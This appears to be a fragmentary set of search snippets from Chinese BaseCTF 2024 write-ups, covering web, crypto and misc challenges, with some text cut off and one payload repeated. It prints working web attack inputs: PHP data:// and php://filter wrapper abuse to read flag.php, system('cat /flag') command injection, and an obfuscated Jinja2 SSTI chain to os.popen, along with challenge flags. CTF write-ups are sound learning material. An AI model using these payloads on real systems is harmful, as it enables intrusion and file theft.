POST: pen=data://plain/text,Aura&challenge=http://jasmineaura.github.io@127.0.0.1&gift=php://filter/read=convert.base64-encode/resource=flag.php 出来base64编码 BaseCTF{a504b0d6-15c5-4f2a-acef-ca363c4b6d05} Crypto helloCrypto from Crypto.Util.number import * from Crypto.Cipher import AE...
得到密码为BaseCTF_h11h_FTCesaB 纯鹿人 得到一个docx 把图片拿出来全选一下会看到端倪 得到base64 然后把docx变成zip,解压拿到里面的图片 010里可以看到端倪 binwalk出来得到压缩包,输入密码得到flag 本文作者:r0xy 本文链接:https://www.cnblogs.com/r0xy/p/18466746 ...
str是被包括起来的,会被预先渲染转义然后才输出,不会被渲染执行,只会获取str对应的字符串 我们通常测试ssti会在可控参数传{{7*7}}之类的数据,它如果返回49那就说明它进行了运算,而不是当成字符串直接输出。显然这段代码不存在ssti,因为它的可控字符是被{{}}包起来的 我们来看一段有漏洞的代码 from flask imp...
2024BaseCTF-week1wp web HTTP 是什么呀 根据提示写出相应的数据 跳转了网页,但没有flag,BP抓哥包 出现了base64的编码 解码 喵喵喵´•ﻌ•` 命令执行 ?DT=system('ls /'); 看到有flag 直接读取flag ?DT=system('cat /flag'); BaseCTF{8eb2a1c2-7de7-437b-bc16-fc3d783b797c} md5绕过欸 ...
{%set a='__ssalc__'|reverse%}{%set b='__esab__'|reverse%}{%set c='__sessalcbus__'|reverse%}{%set d='__tini__'|reverse%}{%set e='__slabolg__'|reverse%}{%set f='nepop'|reverse%}{{''[a][b][c]()[199][d][e]['os'][f]('id')['read']()}} ...
{%set a='__ssalc__'|reverse%}{%set b='__esab__'|reverse%}{%set c='__sessalcbus__'|reverse%}{%set d='__tini__'|reverse%}{%set e='__slabolg__'|reverse%}{%set f='nepop'|reverse%}{{''[a][b][c]()[199][d][e]['os'][f]('id')['read']()}} ...